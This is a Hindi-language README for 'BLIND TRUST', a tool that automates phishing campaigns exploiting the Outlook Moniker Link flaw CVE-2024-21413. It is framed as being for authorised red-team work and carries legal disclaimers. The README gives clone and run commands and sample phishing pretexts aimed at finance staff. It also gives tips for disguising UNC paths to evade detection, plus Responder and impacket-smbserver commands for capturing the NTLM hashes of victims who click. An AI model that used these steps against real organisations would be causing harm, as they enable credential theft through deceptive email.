
एक सुरक्षा अनुसंधान उपकरण जो CVE-2024-21413 (Moniker Link) का उपयोग करके लक्षित फ़िशिंग अभियानों का अनुकरण करता है।
CVE-2024-21413 Moniker Link भेद्यता का उपयोग करके लक्षित फ़िशिंग अभियानों को अनुकरण करने के लिए एक सुरक्षा अनुसंधान उपकरण। अधिकृत रेड टीम संचालन, पेनिट्रेशन टेस्टिंग और सुरक्षा जागरूकता प्रशिक्षण के लिए डिज़ाइन किया गया।
BLIND TRUST एक फ़िशिंग एंगेजमेंट फ्रेमवर्क है जो सुरक्षा टीमों को परिष्कृत ईमेल-आधारित हमलों के विरुद्ध अपनी सुरक्षा को समझने और परीक्षण करने में मदद करता है। यह Outlook के Protected View को बायपास करने के लिए Moniker Link तकनीक का लाभ उठाता है, जो एक यथार्थवादी हमला अनुकरण प्रदान करता है जिसका उपयोग संगठन अपनी सुरक्षा स्थिति को मजबूत करने के लिए कर सकते हैं।
यह उपकरण एंड-टू-एंड अभियान वर्कफ़्लो को स्वचालित करता है - कॉन्फ़िगरेशन से लेकर ईमेल वितरण तक - जबकि अनुकूलन योग्य UNC पथ और लचीले बहाना विकल्पों के माध्यम से परिचालन सुरक्षा बनाए रखता है।
संगठनों को प्रभावी ढंग से बचाव करने के लिए वास्तविक हमला तकनीकों को समझने की आवश्यकता है। TRUST सक्षम करता है:
.txt फ़ाइलों के माध्यम से लक्ष्य लोड करें# रिपॉजिटरी क्लोन करें
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# उपकरण चलाएँ
python3 TRUST_v7.py
यह उपकरण केवल Python मानक लाइब्रेरी मॉड्यूल का उपयोग करता है:
getpass - सुरक्षित पासवर्ड इनपुट
html - HTML एस्केपिंग
ipaddress - IP पता सत्यापन
logging - संरचित लॉगिंग
os - फ़ाइल संचालन
re - नियमित अभिव्यक्तियाँ
signal - सिग्नल हैंडलिंग
smtplib - SMTP ईमेल प्रोटोकॉल
sys - सिस्टम उपयोगिताएँ
time - समय संचालन
dataclasses - कॉन्फ़िगरेशन मॉडलिंग
email - MIME ईमेल निर्माण
typing - प्रकार संकेत
कोई बाहरी पैकेज आवश्यक नहीं - Python 3.7+ के साथ कहीं भी चलता है।
python3 TRUST_v7.py
5 चरणों के माध्यम से इंटरैक्टिव विज़ार्ड का पालन करें:
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
targets.txt बनाएँ:
# Finance Department
[email protected]
[email protected]
[email protected]
# Accounting
[email protected]
[email protected]
फिर चलाएँ:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
दो विकल्प:
.txt फ़ाइल से लोड करें जिसमें प्रति पंक्ति एक ईमेल हो, टिप्पणियाँ # से शुरू होंयहाँ आप स्पष्ट हस्ताक्षरों से बचते हैं:
finance-internal.company.com)quarterly, updates, documentsq3_report, security_patch, training_documentपरिणाम: स्पष्ट \\192.168.1.100\share!exploit के बजाय, आपको कुछ इस प्रकार मिलता है: file://finance-internal.company.com/quarterly!q3_report
Start
↓
[STEP 1] हमलावर ईमेल और SMTP पासवर्ड के लिए संकेत
↓
[STEP 2] SMB लिसनर IP के लिए संकेत
↓
[STEP 3] लक्ष्य ईमेल लोड करें (फ़ाइल या इनपुट)
↓
↓→ प्रत्येक लक्ष्य के लिए:
│ - ईमेल प्रारूप सत्यापित करें
│ - डुप्लिकेट की जाँच करें
│
[STEP 4] ईमेल बहाना के लिए संकेत
│ - विषय, प्रेषक नाम, बॉडी टेक्स्ट
│
[STEP 5] UNC पथ अनुकूलन के लिए संकेत
│ - होस्ट, शेयर, एक्सप्लॉइट नाम
│
↓
[BUILD] कॉन्फ़िगरेशन ऑब्जेक्ट का निर्माण
↓
[VALIDATE] सभी फ़ील्ड की उपस्थिति और वैधता की जाँच
↓
[SUMMARY] समीक्षा के लिए प्री-सेंड सारांश प्रदर्शित करें
↓
[CONFIRM] उपयोगकर्ता स्वीकृत या रद्द करता है
↓
[SEND] प्रत्येक लक्ष्य के लिए:
│ - कस्टम Moniker Link के साथ MIME ईमेल बनाएँ
│ - पुनर्प्रयास तर्क के साथ SMTP वितरण का प्रयास करें
│ - प्रति-लक्ष्य सफलता/विफलता लॉग करें
│
↓
[REPORT] अभियान परिणाम प्रदर्शित करें (वितरित बनाम विफल)
↓
Exit
CVE-2024-21413 (Moniker Link) एक Outlook भेद्यता है जो file:// URL में ! वर्ण एम्बेड करने की अनुमति देती है। जब कोई उपयोगकर्ता ऐसे लिंक पर क्लिक करता है, तो Outlook UNC पथ तक पहुँचने का प्रयास करता है, जो Protected View मोड में भी NTLM प्रमाणीकरण प्रयास को ट्रिगर करता है।
\\host\share!exploit तक पहुँचने का प्रयास करता है! वर्ण Protected View को बायपास करता हैTRUST वितरण चरण को स्वचालित करता है:
समाधान: SMTP क्रेडेंशियल सत्यापित करें। Gmail के लिए, ऐप-विशिष्ट पासवर्ड का उपयोग करें। कॉर्पोरेट मेल के लिए, अपने SMTP व्यवस्थापक से जाँच करें।
समाधान: कुछ SMTP सर्वरों के लिए सामान्य। कनेक्शन TLS एन्क्रिप्शन के बिना आगे बढ़ेगा।
समाधान: सुनिश्चित करें कि वर्डलिस्ट फ़ाइलों में ईमेल पूर्ण और वैध प्रारूप ([email protected]) में हों।
समाधान: ईमेल पता लक्ष्य सर्वर पर मौजूद नहीं है, या सर्वर आपके खाते से रिले को अवरुद्ध कर रहा है।
समाधान: सत्यापित करें कि फ़ाइल पथ सही है और फ़ाइल आपकी वर्तमान निर्देशिका में मौजूद है।
प्रश्न: क्या यह उपकरण उपयोग करने के लिए कानूनी है? A: केवल उस संगठन की स्पष्ट लिखित अनुमति से जिसका आप परीक्षण कर रहे हैं। अनधिकृत फ़िशिंग अवैध है। हमेशा लिखित रूप में कार्यक्षेत्र और संलग्नता नियम रखें।
प्रश्न: क्या यह उन्नत ईमेल फ़िल्टर को बायपास कर सकता है? A: यह एक यथार्थवादी अनुकरण है, लेकिन आधुनिक ईमेल सुरक्षा इसे अभी भी पकड़ सकती है। यही बात है—यदि आपके संगठन के फ़िल्टर इसके विरुद्ध विफल होते हैं, तो आपके पास हल करने के लिए एक समस्या है।
प्रश्न: UNC पथ को अनुकूलित क्यों करें?
A: मूल \\IP\share!exploit एक स्पष्ट संकेत है। वास्तविक हमलावर यथार्थवादी पथ का उपयोग करते हैं। आपकी सुरक्षा टीम को स्पष्ट और सूक्ष्म दोनों संकेतकों को पकड़ना चाहिए।
प्रश्न: क्या मैं इसका उपयोग कर्मचारियों को प्रशिक्षित करने के लिए कर सकता हूँ? A: हाँ। अधिकृत परीक्षण के बाद, सुरक्षा जागरूकता प्रशिक्षण में साफ़ किए गए अभियान उदाहरणों का उपयोग करके कर्मचारियों को वास्तविक हमला तकनीक दिखाएँ।
प्रश्न: क्या यह क्रेडेंशियल कैप्चर करता है? A: नहीं। TRUST केवल ईमेल वितरित करता है। जब लक्ष्य लिंक पर क्लिक करते हैं तो NTLM हैश कैप्चर करने के लिए आपको एक अलग SMB लिसनर (Responder, impacket-smbserver, आदि) की आवश्यकता है।
प्रश्न: मैं SMB लिसनर कैसे सेट करूँ? A: Linux पर Responder या impacket-smbserver का उपयोग करें:
# Responder (हैश कैप्चर करता है)
sudo responder -i eth0 -v
# impacket-smbserver (फ़ाइल सर्वर अनुकरण)
impacket-smbserver Share /tmp -smb2support
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है।
TRUST का उपयोग करके, आप स्वीकार करते हैं कि आप कानूनी निहितार्थों को समझते हैं और आपके पास उचित प्राधिकरण है।
यह प्रोजेक्ट MIT लाइसेंस के तहत जारी किया गया है जिसमें एक उपयोग प्रतिबंध जोड़ा गया है। विवरण के लिए LICENSE देखें।
यह प्रोजेक्ट CVE-2024-21413 पर CMNatic (https://github.com/cmnatic) के मूल शोध और कार्यान्वयन पर आधारित और प्रेरित है।
CMNatic पूर्ण श्रेय के हकदार हैं:
यह रिपॉजिटरी उस कार्य का एक संशोधित और विस्तारित संस्करण है, जिसमें निम्नलिखित संवर्द्धन शामिल हैं:
अधिक विस्तृत आरोपण के लिए CREDITS.md देखें।
H1SS - इस संस्करण को सुरक्षा अनुसंधान और अधिकृत परीक्षण उद्देश्यों के लिए विस्तारित और बनाए रखा।
योगदान का स्वागत है। कृपया सुनिश्चित करें कि कोई भी परिवर्तन:
दिशानिर्देशों के लिए CONTRIBUTING.md देखें।
मुद्दों, प्रश्नों या सुझावों के लिए, GitHub पर एक मुद्दा खोलें।
याद रखें: यह उपकरण एक शोध प्रोजेक्ट है। जिम्मेदारी से, कानूनी रूप से और नैतिक रूप से उपयोग करें।